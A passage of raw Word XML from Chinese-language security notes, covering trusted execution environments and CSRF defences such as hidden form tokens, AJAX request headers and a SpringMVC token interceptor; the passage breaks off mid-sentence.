      </w:pPr>
      <w:r w:rsidRPr="00F54421">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F54421">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>而移动安全发展的一个趋势应该是拥有一个隔离的执行环境，如智能卡，可信执行环境TEE等。TEE从处理器上隔离一个安全区域，目前是比较热门的研究方向，而且也出现了一些商业产品，相信不久会出现在安全性要求比较高的手机等智能设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54421" w:rsidRPr="00F54421" w:rsidRDefault="00F54421" w:rsidP="003A0130">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C7E56" w:rsidRPr="002D63FA" w:rsidRDefault="000871D4" w:rsidP="002D63FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="348" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　　怎样逆向一个数据结构？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F4A33" w:rsidRPr="00F41A4C" w:rsidRDefault="003F4A33" w:rsidP="003F4A33">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00895CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E7779">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="005E7779">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13F3E"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w:t>
      </w:r>
      <w:r w:rsidR="00D13F3E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidR="00D13F3E" w:rsidRPr="00D13F3E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>https://www.zhihu.com/question/21385375</w:t>
      </w:r>
      <w:r w:rsidR="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A6148" w:rsidRPr="007A6148" w:rsidRDefault="00D13F3E" w:rsidP="007A6148">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006D797E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一般针对增删改操作，读操作对于攻击者基本没有什么意义，所以开发者在编写程序时需要符合</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>规范</w:t>
      </w:r>
      <w:r w:rsidR="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用于获取数据</w:t>
      </w:r>
      <w:r w:rsidR="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidR="007A6148" w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用于修改数据</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。常用</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>提交方式有两种</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表单和</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，表单可以通过增加一个隐藏域</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;input type=</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> name=</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> value=</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00C63AB0">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0014091A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0014091A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidR="0014091A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可以通过添加请求头</w:t>
      </w:r>
      <w:r w:rsidR="0014091A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(header)</w:t>
      </w:r>
      <w:r w:rsidR="0014091A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465C79" w:rsidRDefault="007A6148"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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>后端</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>若是</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SpringMVC</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>每次向</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Springmvc</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidR="00966098">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidR="00B16BE4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(*.do,*.jhtml</w:t>
      </w:r>
      <w:r w:rsidR="00B16BE4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00B16BE4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Springmvc</w:t>
      </w:r>
      <w:r w:rsidR="006F65E5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>后台可以设置一个全局拦截器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，可以产生一个随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中可以使用方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>UUID.randomUUID.toString())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>形式发送到客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A6148" w:rsidRDefault="007A6148"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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>假如前端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表单请求是由于</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6148">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>伪造网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来提交的，</w:t>
